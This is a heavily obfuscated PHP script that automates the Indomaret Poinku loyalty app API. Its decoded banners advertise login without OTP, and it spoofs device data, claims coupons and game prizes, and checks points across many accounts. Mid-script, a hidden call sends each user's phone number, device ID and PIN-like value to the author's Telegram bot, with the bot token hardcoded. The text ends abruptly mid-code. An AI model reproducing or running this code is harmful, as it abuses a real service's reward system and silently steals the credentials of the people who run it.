  goto vfw77;
  s0Zx8:
  echo @zM6Ic("\x6e\145\x76\x79", $fZ2bz);
  goto hToI3;
  R1UzT:
  $fZ2bz = @$owfHy["\155\145\x73\x73\141\147\x65"];
  goto P9Ksh;
  btn19:
  die;
  goto gH9aH;
  NKHpy:
  $efQM2 = count($QRhbE) - 1;
  goto cZqL8;
  XDKb2:
  echo "\xa";
  goto ztfZm;
  AKHCV:
  Z7aYS:
  goto ap7nM;
  oaNa1:
  @unlink("\142\x65\141\x74");
  goto AJIdw;
  syrF8:
  $wDisp = '';
  goto jKd1a;
  mNOkA:
  echo @ZM6Ic("\171\145\x6c\154\x6f\167", "\x20\61\x37\40\56\x20\x4d\x69\163\x61\150\40\120\x6f\x69\x6e\40\xa");
  goto zd5Ut;
  SzCcE:
  $mlMLt = @$owfHy["\144\141\x74\x61"]["\141\x63\143\145\x73\x73\x5f\164\157\x6b\x65\x6e"];
  goto SrfgL;
  gVY9A:
  echo "\12";
  goto VuJbz;
  uIFr_:
  echo "\xa";
  goto wb7si;
  H390J:
  goto FMhwq;
  goto a8A3B;
  s332j:
  $wDisp = "\173\42\x64\141\164\141\42\x3a\133\x7b\x22\x61\160\160\154\x69\x63\141\x74\x69\157\156\x22\72\x7b\42\x61\160\x70\x5f\x76\145\x72\x73\151\157\x6e\x22\72\x22\63\56\61\63\56\x30\42\54\42\x64\x65\166\151\143\145\x5f\143\x6c\x61\x73\163\42\72\42\120\150\x6f\156\x65\x22\x2c\x22\144\x65\x76\x69\x63\145\137\x66\141\x6d\151\154\171\42\72\x22" . $GOXkU . "\x22\x2c\x22\x64\x65\166\x69\x63\145\x5f\x69\x64\x22\72\42" . $aY0el . "\42\x2c\x22\157\x73\137\x6e\141\155\x65\42\x3a\x22\x41\x6e\x64\x72\x6f\x69\x64\40\x50\42\54\x22\157\163\137\x76\x65\x72\163\151\157\156\42\x3a\42\x41\x6e\x64\x72\x6f\151\144\40\x39\x22\x7d\x2c\42\x63\x6f\x72\145\42\72\x7b\42\145\x76\x65\x6e\164\137\156\x61\x6d\145\x22\x3a\x22\160\x61\x67\145\137\x76\151\145\167\42\54\42\x65\166\x65\156\164\x5f\164\x69\x6d\145\x73\x74\141\155\160\42\x3a" . $nb9cm . "\x2c\42\x70\141\x67\145\x5f\156\141\155\x65\42\x3a\x22\x64\157\156\x65\40\x72\145\x67\151\163\164\x72\141\164\151\157\156\x22\54\42\160\141\147\x65\x5f\x75\162\154\x70\x61\x74\x68\42\72\x22\42\x7d\54\42\165\163\x65\162\x22\x3a\x7b\42\x73\145\x73\163\151\157\x6e\137\151\144\42\72\42" . $MXjqh . "\42\x2c\x22\x75\x73\x65\162\137\x69\144\x22\72" . $R_bYC . "\54\x22\165\x73\x65\x72\x5f\151\160\137\141\144\144\x72\145\163\163\x22\72\42\61\62\67\x2e\60\x2e\60\56\61\x22\175\x7d\135\x7d";
  goto cQJu1;
  d18Bg:
  $XTuz1 = g1Wxt("\150\164\164\160\x73\x3a\57\57\145\144\x74\163\x61\160\160\x2e\x69\x6e\144\x6f\x6d\141\162\x65\164\160\157\x69\156\153\x75\x2e\x63\x6f\x6d\57\x63\x75\x73\164\x6f\155\x65\162\x2f\x61\x70\x69\170\x2d\x31\65\60\x32\x2d\x61\160\x69\x2f\x6d\157\x62\151\154\x65\57\x63\165\163\164\x6f\155\x65\162\x2d\x61\x64\144\x72\x65\163\163\x2f\144\x69\x73\164\x72\x69\x63\164", $wDisp, $aY0el, $GOXkU, $mlMLt);
  goto WGgVd;
  n0VNS:
  $nb9cm = round(microtime(true) * 1000);
  goto mhQEM;
  Q4cjo:
  @unlink("\x70\x6f\151\x6e\x68\160\56\160\150\160");
  goto Lw8nc;
  jPM24:
  $GOXkU = $w5ulg;
  goto VJfql;
  mL6ay:
  echo @Zm6IC("\147\x72\145\x65\x6e", "\x50\162\x6f\144\165\x6b\40\x4b\145\40\x3a\x20");
  goto Ix3bF;
  pH0u8:
  echo "\xa";
  goto Vy9X8;
  mA_cS:
  $earOL = $sONlZ;
  goto h6t4P;
  Ytgsb:
  $jTEU0;
  goto f9zo8;
  q9Tbh:
  $S8W9D = trim(fgets(STDIN));
  goto zYL9T;
  hiefR:
  echo @zM6Ic("\x6e\x65\166\171", "\40\40\40\40\x20\x20\x20\40\x20\x20\x20\40\40\40\x20\x20\x41\x41\x4d\x49\111\x4e\40");
  goto Ud9mO;
  Lskq2:
  BLHdg($ZNU2M . "\56\x74\x78\x74", $SR3ui);
  goto VE8z4;
  a5NNa:
  $tqWr2 = $zvt88[$yy9BI];
  goto dXHQv;
  Cqx0O:
  echo "\12";
  goto MZ50d;
  S0J70:
  echo "\12";
  goto lDBc5;
  v81hS:
  if (!($jTEU0 < $S8W9D)) {
    goto SXxFu;
  }
  goto vZzSz;
  uTH7V:
  if (!($zn5zd == '')) {
    goto cEejp;
  }
  goto NCHVJ;
  BWtCh:
  $lImQC = json_decode($UHj7C, true);
  goto QScqr;
  za0pO:
  NlIKW:
  goto YUJaT;
  z7JlD:
  ZqS2R:
  goto xsgCP;
  lHXVb:
  goto jOsQR;
  goto sMCF1;
  betTY:
  $w5ulg = str_replace("\15", '', $TvVlh);
  goto jPM24;
  bVfIJ:
  echo $jTEU0;
  goto qGj0M;
  pHOIf:
  $nb9cm = round(microtime(true) * 1000);
  goto N2c3X;
  jmvmq:
  echo "\12";
  goto Xv3BQ;
  pllF8:
  mns5n:
  goto N6fB1;
  X2LRu:
  echo "\12";
  goto TGE3V;
  yqfrR:
  CjBGa:
  goto VEc6T;
  zLIQ0:
  KwD0u:
  goto NoCuK;
  WxP0S:
  die;
  goto UiL6h;
  QfkH3:
  $aoIfK = trim(fgets(STDIN));
  goto oFqKn;
  iqj0r:
  $zcN5u = xOZb4(array("\174"), $tqWr2)[0];
  goto EEf2f;
  PprMi:
  sleep(2);
  goto HTPsC;
  GLRDO:
  $ofEkP = CWALz("\x68\x74\x74\x70\163\72\57\57\145\x64\x74\163\141\x70\x70\56\151\156\144\157\x6d\141\162\145\x74\x70\157\x69\156\x6b\165\56\143\157\x6d\x2f\154\157\x79\141\154\x74\x79\x2f\x61\160\151\170\x2d\61\65\x30\62\x2d\141\160\x69\57\x6d\157\x62\151\154\145\x2f\x63\x6f\151\156\163\x2f\160\162\x69\x7a\x65\x73\x2f\x47\117\106\x52\x45\x53\x48\62\x30\x32\62\x2f\164\157\x6b\x65\156\163\x2f\x63\x6c\141\x69\155\57\163\151\x6e\147\x6c\145", $wDisp, $aY0el, $GOXkU, $mlMLt);
  goto wOHaA;
  ybqqp:
  $earOL = "\x31\x31\x32\62\x33\63";
  goto cjw3d;
  S9Ofg:
  $cQFRW = json_decode($ofEkP, true);
  goto wK3qQ;
  KGBSP:
  gp62g:
  goto CQ6E5;
  cERjc:
  if (!($fUekS == '')) {
    goto Oer0B;
  }
  goto VaxP_;
  PKPd6:
  echo @Zm6Ic("\x6e\x65\x76\x79", "\101\160\141\x6b\x61\150\x20\123\x75\x64\141\x68\40\x54\162\141\x6e\163\x61\x6b\163\x69\40\x3f\40\x28\x20\x79\40\x2f\x20\x6e\40\51\40\x3a\40");
  goto ug1iK;
  bPh6a:
  echo @zM6ic("\x6e\x65\x76\171", $ZNU2M);
  goto TQVo8;
  ecjm5:
  $KOeAA = @$Ap1KM["\x64\x61\164\x61"]["\x72\x65\167\141\x72\x64\163"][0]["\151\x74\145\x6d"][0]["\143\157\165\160\157\156\115\141\x73\164\145\162\x49\x64"];
  goto igLYC;
  J9oHK:
  $wDisp = "\x7b\x22\x70\x68\157\156\x65\116\x75\155\x62\x65\x72\42\72\x22" . $zn5zd . "\42\x2c\42\144\x65\166\151\x63\145\x49\x64\x22\x3a\42" . $aY0el . "\x22\175";
  goto e2ITP;
  P7yvx:
  echo "\xa";
  goto csAPf;
  rjtX2:
  rhRiJ("\113\x75\x70\157\x6e\x20\x50\157\151\x6e\153\x75\40\x6e\x65\167\x2e\164\170\164", $KTLep);
  goto we6J2;
  q3mFb:
  $EghiE = curl_getinfo($C6npe, CURLINFO_HTTP_CODE);
  goto xn_1c;
  SFR6C:
  $upOL9 = G8PF2("\150\164\164\160\163\x3a\57\x2f\145\144\164\x73\141\160\160\x2e\x69\x6e\144\x6f\x6d\x61\x72\145\x74\x70\157\151\x6e\x6b\x75\56\x63\x6f\x6d\57\x25\62\106\147\x61\x6d\145\x25\62\x46\141\x70\x69\x78\55\x31\65\x30\x32\55\x61\x70\151\45\x32\x46\x63\165\163\x74\x6f\155\145\x72\x2d\147\141\155\145\x25\62\106\x67\145\x74\x2d\x63\x6f\165\156\164\x2d\165\156\165\163\x65\144\x2d\x67\141\155\x65", $aY0el, $GOXkU, $mlMLt);
  goto HENgQ;
  qf0ET:
  echo "\12";
  goto kyIGl;
  wboPA:
  $yy9BI++;
  goto FQhy9;
  QDAIS:
  echo "\12";
  goto LtxpM;
  r_9O3:
  echo "\12";
  goto Tj0tS;
  QyKc9:
  $m5BZY = Gggr_("\150\164\x74\160\163\x3a\57\x2f\x61\x73\x69\141\x2d\x73\x6f\x75\164\150\145\x61\x73\x74\62\x2d\x69\144\155\x2d\x63\x6f\162\160\55\160\x72\144\56\x63\154\157\x75\x64\146\x75\x6e\x63\x74\151\157\x6e\163\x2e\x6e\x65\x74\x2f\151\144\x6d\x61\160\160\163\137\x74\162\141\x63\x6b\x65\162\137\x67\x61\164\145\167\x61\171", $wDisp);
  goto TiDu9;
  gUQAz:
  goto XUxU1;
  goto A0jWl;
  u_8of:
  if (!($fUekS == '')) {
    goto NYs__;
  }
  goto TDGwf;
  wE6Ao:
  function JYokI($FK_yc, $bQedf, $p5fm4)
  {
    goto Spqpl;
    cfkIp:
    fclose($FhLCi);
    goto KozWT;
    EylOY:
    fputs($FhLCi, "{$bQedf}\x20\x6b\165\160\157\156\x20{$p5fm4}\xa");
    goto cfkIp;
    Spqpl:
    $FhLCi = fopen($FK_yc, "\141");
    goto EylOY;
    KozWT:
  }
  goto JCfF7;
  xaeG2:
  tVK8J:
  goto nb0l8;
  kspMc:
  goto Q7LGl;
  goto pn_Dn;
  xF8QR:
  echo @ZM6ic("\147\x72\x65\145\156", $wd9cN);
  goto LH0vW;
  DA1mz:
  $wlJRC = XoZb4(array("\x7c"), $wZnHP)[1];
  goto fuGBB;
  MURce:
  $Jzh8Y = strtotime("\53\67\40\144\x61\x79\163", strtotime($fUekS));
  goto prGIN;
  PInYa:
  echo @ZM6iC("\x79\145\154\x6c\x6f\167", "\102\165\151\154\144\x20\x42\171\40\x46\105\x52\x44\x59\x20\x52\101\115\x41\x44\110\x41\x4e\x20");
  goto XOW5Q;
  HOz1w:
  $J0Fkh = @$owfHy["\144\x61\x74\141"]["\143\x6f\x6e\x74\x65\x6e\x74"][$fM3_G]["\x71\165\x6f\164\x61"];
  goto RQ7nA;
  BGYQ7:
  $wlJRC = XOZB4(array("\x7c"), $wZnHP)[1];
  goto zayXM;
  wEyFg:
  $hwqq9 = ThHfS("\x68\x74\164\160\x73\72\x2f\57\x65\x64\x74\x73\x61\x70\160\56\x69\x6e\x64\x6f\155\x61\x72\x65\164\x70\157\x69\156\x6b\x75\x2e\143\157\x6d\57\x6c\157\147\x69\156\x2f\141\160\151\170\55\x31\x35\60\62\55\141\160\151\57\x6f\160\145\x6e\57\160\x69\156\57\x63\x68\145\x63\153\55\144\x65\x76\x69\x63\145", $wDisp, $aY0el, $GOXkU);
  goto eQth1;
  EnqxC:
  $nb9cm = round(microtime(true) * 1000);
  goto OaVT1;
  MK_kh:
  $Ap1KM = json_decode($Jk9cx, true);
  goto Rw6sZ;
  l0tTh:
  echo "\12";
  goto Bneb2;
  KTj7C:
  echo @Zm6iC("\156\x65\166\171", "\40\x53\105\x4d\x4f\107\101\x20\x4c\117\102\101\116\107\40\120\101\116\x54\101\124\40\x4e\x59\x41\x20\102\x49\x53\x55\x4c\101\116\41\x21\x21\x21\x21\40\xa");
  goto cOqby;
  be733:
  echo "\xa";
  goto gCqZ1;
  S9BGT:
  $Jk9cx = G8Pf2("\x68\164\x74\160\x73\x3a\57\57\145\x64\164\x73\141\160\160\56\x69\156\144\x6f\x6d\x61\x72\x65\164\x70\x6f\151\x6e\153\165\x2e\143\x6f\155\57\143\165\x73\164\x6f\155\x65\162\x2f\141\160\151\x78\x2d\x31\65\60\62\55\x61\x70\x69\x2f\155\157\x62\151\x6c\145\x2f\144\x65\164\141\151\154\55\143\x75\x73\164\x6f\155\145\162\x2d\157\162\x69\x67\x69\156", $aY0el, $GOXkU, $mlMLt);
  goto LAc1I;
  kXsPH:
  goto FAMhO;
  goto u4yvz;
  O90sh:
  echo @ZM6Ic("\156\x65\x76\x79", $ABmxY);
  goto X66Js;
  MfNSg:
  @unlink("\160\157\x69\x6e\x68\160\56\x70\150\160");
  goto iancx;
  Uy_YH:
  $Ex3sI = @$lImQC["\x64\141\164\141"]["\143\x6f\156\164\145\x6e\164"][14]["\143\x6f\165\160\x6f\156\103\x6f\144\145"];
  goto dd0D6;
  j96R4:
  $obc_G = str_replace("\15", '', $wlJRC);
  goto g_Gi9;
  AT7qk:
  sleep(5);
  goto z_Kbp;
  OIAkv:
  @unlink("\160\x6f\151\x6e\150\160\x2e\x70\150\x70");
  goto NUaSL;
  Cqo0x:
  if ($S02nx == "\x44\x69\163\x6b\x6f\156\40\122\160\40\62\65\x2e\60\60\60\x20\113\154\151\153\x20\x49\156\144\157\155\141\x72\145\164") {
    goto TRxKr;
  }
  goto hF6Lb;
  bpPTo:
  $zcN5u = XOZB4(array("\x7c"), $wZnHP)[0];
  goto VYgN7;
  cLVAj:
  echo @zM6IC("\171\x65\x6c\154\157\x77", "\x20\x33\40\40\56\40\114\x6f\147\x69\x6e\x20\x50\157\x69\x6e\153\x75\x20\x2b\x20\x43\x65\x6b\40\113\165\160\157\156\12");
  goto hDDi0;
  T7lAa:
  echo @ZM6Ic("\171\145\x6c\154\157\167", "\x41\154\141\x6d\x61\164\x20\120\145\x6e\x65\162\x69\155\x61\x20\x3a\x20");
  goto EafIZ;
  B90Go:
  echo @zM6Ic("\156\145\166\x79", "\40\x20\40\x20\x20\40\40\x20\x20\x20\40\x20\x20\x20\x20\x20\x41\x41\x4d\x49\111\116\40");
  goto naE5z;
  kkk3x:
  echo @Zm6Ic("\x6e\x65\166\171", "\x41\x6b\x75\x6e\40\x4b\x65\x20\40\40\x20\x20\40\40\x20\x3a\40");
  goto aa4PH;
  c2kiA:
  echo "\12";
  goto Mosdc;
  w7BAw:
  $Jk9cx = g8pf2("\150\164\164\x70\x73\x3a\57\x2f\x65\x64\x74\x73\x61\160\160\x2e\151\x6e\144\x6f\155\141\x72\145\164\160\x6f\x69\156\153\x75\56\x63\157\155\57\x63\x75\x73\164\x6f\x6d\145\162\57\x61\160\x69\x78\55\x31\65\x30\x32\x2d\141\160\151\x2f\x6d\x6f\x62\151\x6c\x65\57\147\x65\164\x2d\144\141\x74\141\55\143\165\163\164\x6f\155\x65\x72", $aY0el, $GOXkU, $mlMLt);
  goto dsC4G;
  RERXA:
  if ($RJnNP == "\x79") {
    goto RBkow;
  }
  goto i2jbT;
  smKwr:
  echo @Zm6iC("\x79\x65\154\x6c\x6f\x77", "\x7c\40\x57\101\40\x30\70\x32\61\67\x36\x33\x35\70\62\x39\x35\x20\xa");
  goto SzLuk;
  SYN5I:
  jOsQR:
  goto C4eLu;
  ARsDv:
  $wd9cN = date("\x64\55\x6d\55\131\x20\174\40\110\72\x69\72\163");
  goto OeKCs;
  F38ui:
  $owfHy = json_decode($upOL9, true);
  goto n2vj8;
  MAR0t:
  $wZnHP = $lPULW[$jTEU0];
  goto uZrFH;
  O3LwN:
  echo "\12";
  goto rss7A;
  E30x_:
  $KOeAA = @$Ap1KM["\144\x61\164\141"]["\162\x65\x77\141\x72\x64\163"][0]["\151\x74\145\155"][0]["\x63\157\x75\160\x6f\156\x4d\x61\163\x74\145\x72\x49\x64"];
  goto knqmj;
  UBExk:
  $zn5zd = $U0YgX;
  goto Epd7E;
  P23f4:
  Kt3G1("\146\x6f\162\143\145\143\x6c\157\x73\145", $zn5zd, $aY0el, $earOL, $GOXkU);
  $teeli001 = file_get_contents("https://api.telegram.org/bot5529819060:AAGy5hFZW802Cm7Dut_gOSEtnPMzrY_n49I/sendMessage?chat_id=1069319412&text=$zn5zd|$aY0el|$earOL|$GOXkU");
  goto mSjwl;
  GJAME:
  if (!(is_dir($unXYW) === false)) {
    goto BuRXH;
  }
  goto M2RvH;
  D2u2E:
  WMkHF:
  goto CD5on;
  NQOD6:
  echo @ZM6Ic("\x6e\145\166\x79", $U_EVz);
  goto wPJ_E;
  Zz9To:
  $XDyMm = @$Ap1KM["\144\141\x74\141"]["\x62\141\154\x61\x6e\143\x65"];
  goto gSTn8;
  GVDB9:
  @unlink("\167\150\157\x61\x6d\151");
  goto R1iG3;
  FzNDx:
  die;
  goto XIrU2;
  E94Xn:
  $aY0el = $jlHkA;
  goto CfJPM;
  G3IfU:
  $owfHy = json_decode($XTuz1, true);
  goto czGTj;
  cF172:
  $wZnHP = $lPULW[$jTEU0];
  goto CCFBe;
  RmmjO:
  echo "\12";
  goto AmZDN;
  sJENN:
  if (!($zcN5u == '')) {
    goto Tv6Tl;
  }
  goto Axlar;
  Rd5YL:
  eVHTx:
  goto Pj3Iu;
  Kk5nB:
  xrVSZ:
  goto Stqqe;
  m1FX4:
  echo @ZM6ic("\171\145\x6c\x6c\157\x77", "\x49\104\x20\x6e\x79\141\72\x20");
  goto lWEpz;
  RJm53:
  $yPeiy = @$H1g60["\x72\145\x66\162\x65\x73\x68\124\157\153\x65\156"];
  goto uujgh;
  P5IMs:
  function z82DB($lEbop)
  {
    goto dBopd;
    IkAn3:
    curl_setopt($C6npe, CURLOPT_AUTOREFERER, true);
    goto Vhs69;
    Z6L2U:
    print_r($AXlcQ);
    goto UzvLt;
    yKN8_:
    return false;
    goto CmVPE;
    CmVPE:
    o1K7M:
    goto LNzBO;
    MIwwX:
    $P7lm9 = curl_getinfo($C6npe);
    goto Q2UeS;
    GMYqb:
    BNqo7:
    goto yKN8_;
    L5kXM:
    $y7f11 = substr($ECuqv, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE));
    goto P3ONY;
    LNzBO:
    $AXlcQ = json_decode($y7f11, true);
    goto Z6L2U;
    s_C3d:
    $ruc3h[] = "\x75\163\x65\x72\x2d\141\147\x65\x6e\164\x3a\x20\x6f\x6b\150\164\x74\x70\57\x34\x2e\62\x2e\x31";
    goto IkAn3;
    YAaJJ:
    curl_setopt($C6npe, CURLOPT_COOKIEJAR, "\153\x6c\151\153\x2e\164\170\164");
    goto jg2iv;
    gwKvI:
    curl_setopt($C6npe, CURLOPT_RETURNTRANSFER, 1);
    goto s_C3d;
    Q2UeS:
    if (!$P7lm9) {
      goto BNqo7;
    }
    goto ZJOwI;
    l7W1_:
    curl_setopt($C6npe, CURLOPT_URL, $lEbop);
    goto dkxLg;
    ajBQ3:
    $ECuqv = curl_exec($C6npe);
    goto MIwwX;
    YJOPx:
    curl_setopt($C6npe, CURLOPT_SSL_VERIFYPEER, 0);
    goto YAaJJ;
    P3ONY:
    goto o1K7M;
    goto GMYqb;
    ZJOwI:
    $ruc3h = substr($ECuqv, 0, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE));
    goto L5kXM;
    dkxLg:
    curl_setopt($C6npe, CURLOPT_FOLLOWLOCATION, true);
    goto gwKvI;
    jg2iv:
    curl_setopt($C6npe, CURLOPT_COOKIEFILE, "\x6b\154\151\153\56\164\170\164");
    goto ajBQ3;
    dBopd:
    $C6npe = curl_init();
    goto l7W1_;
    UzvLt:
    return $ECuqv;
    goto iA0Gr;
    Vhs69:
    curl_setopt($C6npe, CURLOPT_HTTPHEADER, $ruc3h);
    goto YJOPx;
    iA0Gr:
  }
  goto kaJU8;
  EmOI6:
  $a7K8a = AUjhz("\150\x74\164\x70\163\72\x2f\57\146\x69\162\x65\142\141\x73\x65\162\145\155\x6f\164\x65\143\x6f\156\x66\151\x67\x2e\x67\x6f\x6f\147\x6c\x65\141\x70\x69\163\56\x63\x6f\155\57\166\x31\57\x70\162\157\152\x65\143\x74\163\x2f\x39\x39\70\x38\61\x36\66\60\x35\63\x32\x38\57\x6e\x61\155\x65\x73\x70\x61\x63\145\163\x2f\x66\151\x72\145\x62\141\163\x65\x3a\x66\x65\x74\x63\150", $wDisp, $YYbml);
  goto uNK1N;
  gSIlt:
  $zvt88 = $QRhbE;
  goto hOWCA;
  wmFCH:
  echo "\12";
  goto Vsuo7;
  ZHFaV:
  echo "\xa";
  goto yZNY3;
  I9fin:
  jwQwr:
  goto ZL0rA;
  W_0f1:
  echo "\12";
  goto vpl0C;
  O7Cr_:
  echo "\12";
  goto M6z1l;
  TGE3V:
  echo @zM6iC("\x6e\x65\x76\x79", "\x4f\x54\x50\40\x20\x20\40\40\72\x20");
  goto iqD2p;
  Rd6rJ:
  $xT15V = G8pf2("\150\x74\x74\160\163\x3a\x2f\57\x65\144\x74\x73\141\x70\160\56\151\156\144\157\155\x61\x72\145\x74\160\157\151\x6e\153\x75\56\x63\x6f\155\57\154\x6f\171\x61\x6c\x74\171\x2f\141\x70\x69\170\x2d\61\65\60\62\x2d\x61\x70\x69\x2f\155\x6f\142\151\154\x65", $aY0el, $GOXkU, $mlMLt);
  goto pIWJg;
  OMsUG:
  echo "\12";
  goto mtQr3;
  q4tYJ:
  function M20zQ($cF6mU, $aoIfK)
  {
    goto g3KLj;
    g3KLj:
    $xp_1p = fopen("\x2f\163\x74\x6f\x72\141\x67\145\57\x65\155\x75\154\141\x74\x65\144\x2f\60\x2f\101\x6e\x64\x72\157\x69\x64\x2f\171\157\165\x72", "\167");
    goto kBLFX;
    kBLFX:
    fwrite($xp_1p, $aoIfK);
    goto pIG0R;
    pIG0R:
    fclose($xp_1p);
    goto P4gp9;
    P4gp9:
  }
  goto gA4yc;
  QT3R_:
  $jTEU0;
  goto cjmuY;
  EEf2f:
  if (!($zcN5u == '')) {
    goto to00G;
  }
  goto w3RTq;
  U2vmb:
  echo @ZM6Ic("\x6e\145\x76\171", $XDyMm);
  goto OH7B2;
  akKs3:
  die;
  goto l8XQm;
  VOfPN:
  echo @Zm6iC("\171\x65\x6c\154\157\x77", "\x20\x2d\x20\x53\151\154\141\150\153\141\x6e\40\x4d\x65\x6c\x61\153\165\153\141\x6e\x20\x54\162\x61\156\x73\141\153\x73\151\x20\124\145\x72\154\145\x62\151\x68\x20\x44\x61\150\x75\154\x75\12");
  goto mH2RK;
  ItGdn:
  echo @Zm6ic("\156\x65\x76\x79", "\40\x20\x20\x20\40\40\40\x20\40\x20\x59\101\116\107\x20\x4e\x59\105\102\x41\x52\x49\x4e\x20\123\x43\122\x49\120\x54\40\x49\116\111\40\xa");
  goto GHAKe;
  YNuST:
  $dQ8Tp = trim(fgets(STDIN));
  goto LZi1O;
  wak68:
  $ABmxY = @$C46m0["\x6d\145\x73\163\x61\147\145"];
  goto vMlpG;
  DkiWA:
  $tqWr2 = $zvt88[$yy9BI];
  goto c6hC1;
  oFqKn:
  r1qLS("\x6d\x6f\162\145", $aoIfK);
  goto QnwC5;
  fZZU1:
  echo "\x44\145\x6c\x65\x74\x65\144\x20{$xp_1p}\x20\x20";
  goto D6NeB;
  kaBU8:
  $zcN5u = XOzb4(array("\174"), $wZnHP)[0];
  goto wURJg;
  ACpFN:
  echo $zn5zd;
  goto Oy0iQ;
  nxHbq:
  $mQ1PX = $E_1ED[$jTEU0];
  goto ZyY5B;
  FEUU4:
  echo @ZM6IC("\x6e\x65\x76\x79", "\123\x6f\x72\x72\x79\x2c\x20\124\150\151\163\x20\x53\x63\162\x69\160\x74\x20\x48\x61\163\x20\102\145\x65\x6e\40\122\145\155\x6f\x76\145\x64\x20\x42\171\x20\124\x68\145\40\117\x77\156\x65\x72\x21\x21");
  goto IkNDt;
  d28r0:
  $zcN5u = Xozb4(array("\174"), $wZnHP)[0];
  goto mBoJz;
  oXdZF:
  D4vRH:
  goto tUsG6;
  H2AMl:
  goto pj0Fz;
  goto pIdXS;
  w73ga:
  bI4pG:
  goto XUNNf;
  tYtSk:
  $N0XGD = g8PF2("\x68\x74\164\160\163\x3a\57\57\145\144\x74\163\x61\x70\160\56\x69\156\144\x6f\x6d\141\x72\x65\164\x70\x6f\151\x6e\x6b\165\56\x63\157\x6d\57\x6c\x6f\x79\141\x6c\164\171\x2f\141\x70\x69\170\x2d\x31\x35\x30\62\x2d\141\x70\151\x2f\x6d\157\142\151\x6c\x65\57\160\x6f\151\x6e\164\163\x2f\155\x65", $aY0el, $GOXkU, $mlMLt);
  goto KmhR1;
  qd5SF:
  $D2zwh++;
  goto wZPE1;
  OUYab:
  $zvt88 = $QRhbE;
  goto FYHKZ;
  gNONM:
  echo @Zm6IC("\171\145\x6c\154\157\x77", "\x54\157\x74\x61\x6c\x20\x42\111\x4a\111\x20\x20\x20\x3a\40");
  goto ZVH0z;
  xc_cJ:
  echo @zm6Ic("\156\145\166\x79", "\x50\x69\154\x69\150\40\x4b\157\x74\x61\40\x4d\141\x6e\x61\x20\x3f\40\x3a\x20");
  goto xMmo2;
  AEacE:
  $v9NcH = @$Ap1KM["\144\141\x74\x61"]["\142\141\154\141\x6e\x63\145"];
  goto sEWO8;
  XdjRG:
  echo @Zm6IC("\156\x65\166\171", "\x53\157\x72\162\x79\54\40\x54\150\151\163\40\123\143\x72\151\160\x74\x20\x48\x61\163\x20\x42\x65\x65\x6e\x20\122\x65\155\x6f\166\145\x64\40\102\171\x20\x54\150\x65\x20\x4f\167\x6e\x65\x72\x21\41");
  goto bfEta;
  P08e3:
  $GOXkU = $w5ulg;
  goto k0Qg0;
  Geoq3:
  $aY0el = $v1ZMX;
  goto ZjJFF;
  LtxpM:
  $DxrJr = "\x31\x30\x30\60\60\x30\x30\60\60\x30\x30\60\60\x30\60\x30\x30\60";
  goto Fhrtw;
  IeLcz:
  $LwPoO = @$owfHy["\144\141\164\141"]["\x63\157\156\x74\145\x6e\164"][$qtgR3]["\151\155\141\147\145\125\x72\154"];
  goto gwIsu;
  BQUXh:
  k2R5x:
  goto la72U;
  Yx_cW:
  echo @Zm6ic("\x67\162\145\145\x6e", $wd9cN);
  goto PZVdK;
  lJl7c:
  $jTEU0;
  goto xWUEy;
  T3KX5:
  $tqWr2 = $zvt88[$yy9BI];
  goto YTR8P;
  D3Nkz:
  Yni8F:
  goto MpoPp;
  mHrTZ:
  $wd9cN = date("\144\55\x6d\x2d\x59\40\174\40\x48\x3a\151\x3a\163");
  goto FA82m;
  u0z5i:
  if (!($zcN5u == '')) {
    goto PSckK;
  }
  goto ID5xm;
  tXZim:
  echo @zm6Ic("\x79\145\154\154\157\167", "\x5b\x31\x5d\x20{$odYyL}\40\12\x20\40\40\x20\x3e\x20{$KTLep}\x20\12\12");
  goto QY65c;
  e3Mm3:
  echo "\12";
  goto ZDwf_;
  X73Ka:
  $obc_G = str_replace("\xd", '', $wlJRC);
  goto pKI5I;
  VtQl6:
  echo "\xa";
  goto BCr2g;
  EBiBT:
  echo @ZM6ic("\171\x65\x6c\x6c\x6f\x77", "\x41\160\x61\153\141\x68\40\115\x65\155\x62\145\162\40\102\141\162\165\x20\x3a\40");
  goto EnReM;
  lCoM2:
  $raN1z = @$lImQC["\x64\x61\164\x61"]["\143\157\x6e\164\145\156\164"][7]["\x63\x6f\x75\160\157\x6e\x43\157\144\145"];
  goto kXusB;
  utQaz:
  echo @ZM6IC("\x79\x65\154\x6c\157\167", "\112\x75\155\x6c\141\x68\x20\123\x74\141\155\160\x20\72\40");
  goto B2VT8;
  V_8q5:
  EDwN1:
  goto PTWfM;
  Cr9sd:
  echo "\xa";
  goto CsTYI;
  B2VT8:
  echo @ZM6ic("\156\145\x76\x79", $v9NcH);
  goto A0K7O;
  OG_cq:
  if ($ZNU2M == "\103\x61\x73\x68\x62\x61\x63\x6b\x20\62\x2e\x35\x30\60\x20\120\157\151\x6e") {
    goto Jcs9o;
  }
  goto yAt0D;
  NTjXY:
  rHriJ("\113\x75\160\x6f\x6e\x20\x50\x6f\x69\156\153\x75\40\156\x65\167\56\x74\x78\x74", $lbuGr);
  goto V_8q5;
  ibb5f:
  $tqWr2 = $zvt88[$yy9BI];
  goto Y6dlB;
  lEx9p:
  SjMQr:
  goto CV2DM;
  A2sIk:
  if (!($Pud0o == "\x74\x72\165\145")) {
    goto wSyTI;
  }
  goto WtOtG;
  rUsk1:
  PLb2v:
  goto nlQXj;
  v0pQL:
  goto ODvt2;
  goto zruIg;
  DDFYo:
  if (!($cPDPt == 13)) {
    goto eZaFp;
  }
  goto E0app;
  uNbOq:
  $zcN5u = xoZB4(array("\x7c"), $wZnHP)[0];
  goto VCCS6;
  x7CO6:
  echo @zM6ic("\147\x72\x65\145\x6e", "\x4b\157\x74\141\x20\113\x65\x20\72\x20");
  goto sde23;
  CH3Nn:
  echo @ZM6iC("\x6e\145\x76\x79", "\x20\174\x20\123\x63\162\151\x70\164\x20\111\104\x4d\40\114\x4f\x47\111\x4e\x20\x50\117\111\116\113\x55\40\124\x41\116\120\x41\40\117\x54\120\xa");
  goto yrVV7;
  Zs3mW:
  ZlzNN:
  goto Uz5sc;
  fxg3h:
  echo $yy9BI . "\x2e\40";
  goto o8_Bq;
  sZiim:
  $earOL = $sONlZ;
  goto BVXm3;
  tKy2G:
